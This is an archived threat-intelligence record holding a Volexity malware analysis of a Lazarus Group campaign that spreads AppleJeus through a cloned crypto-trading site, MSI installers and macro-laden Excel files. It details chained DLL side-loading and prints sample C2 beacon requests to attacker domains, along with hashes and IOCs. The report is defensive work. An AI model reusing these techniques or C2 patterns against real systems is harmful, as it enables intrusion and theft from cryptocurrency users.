{ "id": "6a3434ad-cf18-439b-945d-86947e13bc30", "created_at": "2026-04-06T00:19:56.73826Z", "updated_at": "2026-04-10T13:12:44.674541Z", "deleted_at": null, "sha1_hash": "7d4807f9b35efed20d8770c0ac67a921d141b29e", "title": "₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2923079, "plain_text": "₿uyer ₿eware: Fake Cryptocurrency Applications Serving as\r\nFront for AppleJeus Malware\r\nBy mindgrub\r\nPublished: 2022-12-01 · Archived: 2026-04-05 13:18:07 UTC\r\nOver the last few months, Volexity has observed new activity tied to a North Korean threat actor it tracks that is\r\nwidely referred to as the Lazarus Group. This activity notably involves a campaign likely targeting cryptocurrency\r\nusers and organizations with a variant of the AppleJeus malware by way of malicious Microsoft Office documents.\r\nVolexity’s analysis of this campaign uncovered a live cryptocurrency-themed website with contents stolen from\r\nanother legitimate website. Further technical analysis of the deployed AppleJeus malware uncovered a new\r\nvariation of DLL side-loading that Volexity has not seen previously documented as in the wild.\r\nThis blog outlines new techniques used by the Lazarus Group, analyzes recent AppleJeus malware variants, shares\r\nindicators from other versions of this malware, as well as outlines links between this activity and historic\r\ncampaigns. The end of the post includes detection and mitigation opportunities for individuals or organizations\r\nlikely to be targeted by this activity. As with all Volexity blogs, related indicators can be found on here on Github.\r\nFake Website\r\nIn June 2022, the Lazarus Group registered the domain name bloxholder[.]com, and then configured it to host a\r\nwebsite related to automated cryptocurrency trading. Further investigation revealed that this website was largely a\r\nclone of the legitimate website, HaasOnline (haasonline[.]com. All “HaasOnline” references were changed to\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 1 of 13\n\n“BloxHolder” and a handful of other updates were made throughout. A comparison of the two websites can be\r\nseen below (Figure 1).\r\nFigure 1. The legitimate website (left) and the clone (right)\r\nVolexity discovered the fraudulent BloxHolder website after identifying a new AppleJeus malware sample that\r\nwas bundled as part of a Microsoft Installation (MSI) file. This discovered file, the  “BloxHolder application”, is\r\nactually another case of AppleJeus being installed alongside the open-source cryptocurrency trading application\r\nQTBitcoinTrader that is available on GitHub. This same legitimate application has previously been used by the\r\nLazarus Group, as documented in this report from CISA. The MSI file is used to install both the malicious and\r\nlegitimate applications at the same time. File details are provided below:\r\nFilename BloxHolder_v1.2.5.msi\r\nSize 13305856 bytes\r\nMD5 245bb604621cea7962668325995bca7c\r\nSHA1 cc5544eff3e5b9cf20d8cf2291147596d4346dbe\r\nSHA256 eee4e3612af96b694e28e3794c4ee4af2579768e8ec6b21daf71acfc6e22d52b\r\nThe MSI file installs the legitimate application while also creating a scheduled task and additional malicious files\r\nin the folder “%APPDATA\\%Roaming\\Bloxholder\\”. The files created in this directory are shown in the\r\nscreenshot below (Figure 2).\r\nFigure 2. Screenshot showing files dropped by the MSI\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 2 of 13\n\nThe task is executed at log on for any user. Its purpose is to execute another legitimate executable\r\n(“CameraSettingsUIHost.exe”) with two arguments (“18e190413af045db88dfbd29609eb877” and “lion”).\r\n“CameraSettingsUIHost.exe” is a Microsoft file that assists with usage of a webcam on the system. The created\r\nscheduled task can be seen in Figure 3.\r\nFigure 3. Malicious scheduled task created by the malware\r\nIt is in “CameraSettingsUIHost.exe” that the novel DLL side-loading occurs.\r\nNovel DLL Side-loading Technique\r\nConventional DLL Side-Loading\r\nAs a quick primer, when an executable attempts to load a library (DLL) in Windows, it will look for this library in\r\na set order of locations. This process is documented by Microsoft here. Therefore, by placing a malicious DLL in\r\nthe same folder as the calling application, an attacker can ensure it is loaded before a legitimate DLL of the same\r\nname in the system directory. This is conventional DLL side-loading (Figure 4).\r\nFigure 4. Conventional\r\nDLL side-loading\r\nChained DLL Side-Loading\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 3 of 13\n\nThe novel technique used in this case adds a step to this process.  The legitimate application loads a legitimate\r\nDLL from the “System32” directory, and then that DLL causes the loading of a malicious DLL from the\r\napplication’s directory. Specifically, “CameraSettingsUIHost.exe” loads the “dui70.dll” file from the “System32”\r\ndirectory, which then causes the loading of the malicious “DUser.dll” file from the application’s directory into the\r\n“CameraSettingsUIHost.exe” process. The “dui70.dll” file is the “Windows DirectUI Engine” and is normally\r\ninstalled as part of the operating system. This novel DLL side-loading process is illustrated in Figure 5 below.\r\nFigure 5. Chained DLL side-loading\r\nIt is not clear why the threat actor added this additional step. It could cause some confusion and slow down\r\nmalware analysis, but ultimately the location of the files are still the same as using the conventional method.\r\nIn a non-subtle manner, Volexity noted the internal name of DUser.dll to be HijackingLib.dll. Its purpose is to\r\ndecode and load a PE file passed as the first argument on the command line, using a key passed as the second\r\nargument.\r\nAppleJeus Malware\r\nAs shown in the scheduled task in Figure 3, the name of the encoded PE file was\r\n“18e190413af045db88dfbd29609eb877”, and the second argument on the command line, “lion”, is the XOR key\r\nused to decode the file. The XOR is 8 bytes in length. If the supplied key is smaller, it is padded with null bytes.\r\nThe decoded PE file is a downloader. Volexity identified two variants. The first variant is not obfuscated.\r\nFilename e190413af045db88dfbd29609eb877\r\nSize 165376 bytes\r\nMD5 18644822140eda7493bd75ba1e1f235d\r\nSHA1 b801643e2d817931e6aa36e6bf24d1c42e9b8fdc\r\nSHA256 fe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e\r\nIts purpose is to collect information on the infected system and download shellcode from the command-and-control (C2) server. The following data is collected:\r\nMAC address\r\nComputer name\r\nOS version\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 4 of 13\n\nThis system data is likely collected to identify if the infected system is a virtual machine or sandbox, or if it is a\r\ngenuine victim. These details are sent to the C2 and the malware expects the response to contain shellcode to\r\nexecute. Volexity did not receive any additional payload at the time of analysis.\r\nAn example of the POST request used to send this data is given below:\r\nPOST /daemon/update.php HTTP/1.1\r\ncontent-type: application/x-www-form-urlencoded\r\nauth_timestamp: \u003cepoch time\u003e\r\nauth_signature: \u003chex value\u003e\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/103.0.0.0 Safari/537.36\r\nHost: bloxholder.com\r\nContent-Length: 75\r\nCache-Control: no-cache\r\nrlz=MDI6MDA6NEM6NEY6NEY6NTAA\u0026ei=Windows 10(19044)-LAPTOP-B39AD4N\u0026act=check\r\nFigure 6 shows the pseudocode that builds this request structure.\r\nFigure 6. POST request built by the malware\r\nThis malware is a variant of the AppleJeus malware. The network communication is similar to that described in\r\nprevious reporting by Kaspersky and CISA. Volexity identified several other MSI files with cryptocurrency\r\nthemes that are linked to this campaign. While these are not referenced in detail here, they are included among the\r\nIOCs. Analysis of those additional MSIs resulted in the identification of a second AppleJeus variant, which is\r\nheavily obfuscated and has a different network protocol.\r\nName(s) E57D8443104825AB22743C78B8F3AA\r\nSize 116224 Bytes\r\nMD5 76111d9780b2d0b5adee61cf752d937e\r\nSHA1 5b03294b72c0caa5fb20e7817002c600645eb475\r\nSHA256 9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 5 of 13\n\nAll strings and API calls are obfuscated using a custom algorithm. The network request follows this pattern:\r\nGEThxxps://strainservice[.]com/resources?a=1666860077\u0026v=1666527365\r\nThe network requests made by these newer samples match those of historical AppleJeus malware samples.\r\nMalicious Microsoft Office Documents\r\nIn October 2022, Volexity discovered in a minor departure from the Lazarus Group’s typical method of installing\r\nAppleJeus via an MSI installer. This new method uses a malicious Microsoft Office document. Details of this\r\ndocument are below:\r\nFilename OKX Binance \u0026 Huobi VIP fee comparision.xls\r\nSize 219136 bytes\r\nMD5 51871504c1d5c09ade5e2a1e6e98c37a\r\nSHA1 ae34fa6c6baf77390fb3ff683d880cde14bf893d\r\nSHA256 17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b\r\nThe document uses embedded macros to deploy malware on the target system. Figure 7 shows the decoy content\r\ndisplayed to the user.\r\nFigure 7. Contents of malicious Microsoft Excel file showing cryptocurrency coin rates\r\nThe document contains a macro split into two parts. The purpose of the first part is to decode a base64 blob that\r\ncontains a second OLE object containing a second macro. The initial document also stores several variables,\r\nencoded using base64, in a form object (Figure 8).\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 6 of 13\n\nFigure 8. Configuration data for the macro stored in a form object\r\nThe variables shown in Figure 8 are used by the second macro to define where the malware will be deployed on\r\nthe infected system. The decoded values are shown below:\r\nBase64 Value Decoded Base64 Value\r\nQwA6AFwAUAByAG8AZwByAGEAbQBE\r\nAGEAdABhAFwAUwBvAA==\r\nC:\\ProgramData\\So\r\nNQA2ADcANgAyAGUAYgA5AC0ANAAxA\r\nDEAYwAtADQAOAA0ADIALQA5ADUAMw\r\nAwAC0AOQA5ADIAMgBjADQANgBiAGEAMgBkAGEA\r\n56762eb9-411c-4842-9530-9922c46ba2da\r\nZgB0AHcAYQByAGUAQwBhAGMAaABlAFwA ftwareCache\\\r\nLwBzAGgAYQBkAG8AdwA= /shadow\r\nbABvAGcAYQBnAGUAbgB0AC4AZQB4AGUA logagent.exe\r\ndwBzAG8AYwBrADMAMgAuAGQAbABsAA== wsock32.dll\r\nThe ultimate purpose is to download a remotely hosted payload from public file-sharing service, OpenDrive.\r\nFigure 9 shows the URL from where the payload is downloaded.\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 7 of 13\n\nFigure 9. Next stage payload stored on OpenDrive\r\nWhile the file was no longer available at the time of analysis, based on public sandbox results for the file in\r\nquestion, the downloaded payload, “Background.png”, embeds the following three files:\r\n“Logagent.exe” – a legitimate file (md5: eb1e19613a6a260ddd0ae9224178355b)\r\n“wsock32.dll” – a side-loaded library internally named HijackingLib.dll (md5:\r\ne66bc1e91f1a214d098cf44ddb1ae91a)\r\n“56762eb9-411c-4842-9530-9922c46ba2da” – an encoded payload decoded by “wsock32.dll”\r\nThe three files are dropped on disk using hardcoded offsets that can be found in the second macro. The file paths\r\nare computed from the base64 variables mentioned previously. Figure 10 shows the writing of the files.\r\nFigure 10. Different offsets used to extract the malicious files\r\nDespite not having access to the final payload, Volexity assesses this is related to the same Lazarus Group\r\ncampaign based on the following factors:\r\nThe filename pattern used for the payload (using a UUID style format)\r\nThe command-line arguments (\u003cexecutable\u003e \u003cfilename\u003e \u003cxor key\u003e)\r\nThe behavior of the side-loaded library\r\nSignificant similarities in the code between “DUser.dll” and “wsock32.dll”\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 8 of 13\n\nThe same internal name of “dll”\r\nComparison with Older AppleJeus Campaigns\r\nThe following table describes similarities Volexity has identified between the campaign described in this blog and\r\nthe overview of historical campaigns described by CISA.\r\nUsed In Current Campaign Similar to Historical Campaigns\r\nMSI package\r\nAppleJeus Version 1,\r\nAppleJeus Version 2,\r\nAppleJeus Version 3,\r\nAppleJeus Version 4,\r\nAppleJeus Version 5,\r\nAppleJeus Version 6\r\nFiles located in %APPDATA%\\Roaming\\%APPNAME%\\\r\nAppleJeus Version 2,\r\nAppleJeus Version 3,\r\nAppleJeus Version 4,\r\nAppleJeus Version 5,\r\nAppleJeus Version 6\r\nNamecheap used to host C2\r\nAppleJeus Version 5,\r\nAppleJeus Version 6,\r\nAppleJeus Version 7\r\nUse of fake QT Bitcoin Trader app\r\nAppleJeus Version 1,\r\nAppleJeus Version 2\r\nThe PE metadata structure of the files used in the current campaign and historical campaigns follow similar\r\nformats, shown in Figures 11 and 12 below.\r\nFigure 11. PE metadata structure of current campaign\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 9 of 13\n\nFigure 12. PE metadata structure of historical campaigns\r\nIn addition to the information from the CISA report, the network protocol from the first analyzed sample is the\r\nsame as the one described by Kaspersky in this report. The screenshot in Figure 13 (Kaspersky publication) shows\r\nthe same protocol as that shown in Figure 6 (the first sample from this blog).\r\nFigure 13. POST request from Kaspersky report\r\nNew elements of this current campaign include the following:\r\nUsage of malicious Microsoft Office documents in addition to the backdoored applications\r\nPerforming DLL side-loading in two steps, rather than a single step\r\nNew AppleJeus variants with strings and API obfuscation, and a new network protocol\r\nConclusion \u0026 Mitigations\r\nIn February 2021, CISA published an advisory concerning the AppleJeus malware. The advisory describes the\r\nvariants observed from 2018 to 2021. Volexity has identified a similar campaign taking place between June and\r\nOctober 2022 using new variants of AppleJeus. The campaign from June 2022 follows the same broad pattern as\r\nthe one described by CISA: a cryptocurrency application packaged in a malicious MSI file.\r\nThe dropped payloads in the recent campaign abuse DLL side-loading techniques to execute the next stage. But\r\nthe DLL side-loading implementation was not always standard. In some cases, it was performed by proxy, where\r\nthe EXE calls a DLL that subsequently calls the attacker’s DLL. It is interesting to note that the malicious side-loaded library has strong obfuscation of all strings and API calls, making static analysis more complex.\r\nAlso newly observed was the shift, discovered in October 2022, from the use of MSI files to malicious Microsoft\r\nOffice documents. The Microsoft Office documents use an OLE object with a macro dynamically loaded from\r\nanother macro. This technique seems to reduce static detection by security products, and it deviates from what is\r\nnow a publicly well-documented campaign.\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 10 of 13\n\nThe Lazarus Group continues its effort to target cryptocurrency users, despite ongoing attention to their campaigns\r\nand tactics. Perhaps in an attempt to allude detection, they have decided to use chained DLL side-loading to load\r\ntheir payload. Additionally, Volexity has not previously noted the use of Microsoft Office documents to deploy\r\nAppleJeus variants. Despite these changes, their targets remain the same, with the cryptocurrency industry being a\r\nfocus as a means for the DPRK to bolster their finances.\r\nTo generically detect and investigate attacks like the one described in this blog, Volexity recommends the\r\nfollowing:\r\nWhere possible, block macro execution in Microsoft Office as described in this Microsoft post.\r\nMonitor creation of new scheduled tasks to identify anomalies.\r\nTo prevent these specific attacks, Volexity recommends the following:\r\nUse the YARA rules here to detect related activity.\r\nBlock the IOCs provided here.\r\nVolexity’s Threat Intelligence research, such as the content from this blog, is published to customers via\r\nits Threat Intelligence Service and was covered by TIB-20221103. Volexity Network Security\r\nMonitoring customers are also covered automatically through signatures and deployed detections from\r\nthe threats and IOCs described in this post.\r\nVolexity’s leading memory analysis product, Volexity Volcano, detects the DLL side-loading technique\r\ndiscussed in this post through its “Search Order Hijacking” analytic.\r\nIf you are interested in learning more about these products and services, please do not hesitate\r\nto contact us.\r\nAppendix\r\nRelated IOCs include the following:\r\nvalue entity_type description\r\n17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b file\r\nMalicious\r\nOffice\r\ndocument\r\nabca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0 file\r\nMalicious\r\nOffice\r\ndocument\r\na2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9 file\r\nMalicious\r\nOffice\r\ndocument\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 11 of 13\n\nvalue entity_type description\r\n2e8d2525a523b0a47a22a1e9cc9219d6526840d8b819d40d24046b17db8ea3fb file\r\nDLL\r\nhijacking\r\nsample\r\n82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a162 file\r\nDLL\r\nhijacking\r\nsample\r\n90b0a4c9fe8fd0084a5d50ed781c7c8908f6ade44e5654acffea922e281c6b33 file\r\nDLL\r\nhijacking\r\nsample\r\nefaf52549ffcc8a16373a8f7f0bddebabc3edc17f71b0158bbaf89c1b29a6043 file\r\nDLL\r\nhijacking\r\nsample\r\na0db8f8f13a27df1eacbc01505f311f6b14cf9b84fbc7e84cb764a13f001dbbb file\r\nunxored\r\nAppleJeus\r\n9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78 file\r\nunxored\r\nAppleJeus\r\nfe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e file\r\nunxored\r\nAppleJeus\r\ne5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487 file\r\nMSI installer\r\ncontaining\r\nAppleJeus\r\neee4e3612af96b694e28e3794c4ee4af2579768e8ec6b21daf71acfc6e22d52b file\r\nMSI installer\r\ncontaining\r\nAppleJeus\r\n82d6b2e14763f398d2a559d3f7fbf2f7a3c7f9001c8dcdf4543d4ff0b97a8785 file\r\nMSI installer\r\ncontaining\r\nAppleJeus\r\n636813038ba5c9755aa881ae62e2911df3b8f84ad1d2ff682e325e00d24d4a74 file\r\nMSI installer\r\ncontaining\r\nAppleJeus\r\n295c20d0f0a03fd8230098fade0af910b2c56e9e5700d4a3344d10c106a6ae2a file\r\nMSI installer\r\ncontaining\r\nAppleJeus\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 12 of 13\n\nvalue entity_type description\r\n479cc0a490ffa98652683796c5cef12f3e6380107aac83321a9705048b801b54 file\r\nMSI installer\r\ncontaining\r\nAppleJeus\r\n4c5611d63fd78a2de9591d7b4d70c574d1f534a2aec86bb70bd49e60fafd54ea file\r\nMSI installer\r\ncontaining\r\nAppleJeus\r\nstrainservice[.]com hostname\r\nAppleJeus\r\nC2 server\r\nbloxholder[.]com hostname\r\nAppleJeus\r\nC2 server\r\nrebelthumb[.]net hostname\r\nAppleJeus\r\nC2 server\r\nwirexpro[.]com hostname\r\nAppleJeus\r\nC2 server\r\noilycargo[.]com hostname\r\nAppleJeus\r\nC2 server\r\ntelloo[.]io hostname\r\nAppleJeus\r\nC2 server\r\nSource: https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/" ], "report_names": [ "buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "544ecd2c-82c9-417c-9d98-d1ae395df964", "created_at": "2025-10-29T02:00:52.035025Z", "updated_at": "2026-04-10T02:00:05.408558Z", "deleted_at": null, "main_name": "AppleJeus", "aliases": [ "AppleJeus", "Gleaming Pisces", "Citrine Sleet", "UNC1720", "UNC4736" ], "source_name": "MITRE:AppleJeus", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434796, "ts_updated_at": 1775826764, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7d4807f9b35efed20d8770c0ac67a921d141b29e.pdf", "text": "https://archive.orkl.eu/7d4807f9b35efed20d8770c0ac67a921d141b29e.txt", "img": "https://archive.orkl.eu/7d4807f9b35efed20d8770c0ac67a921d141b29e.jpg" } }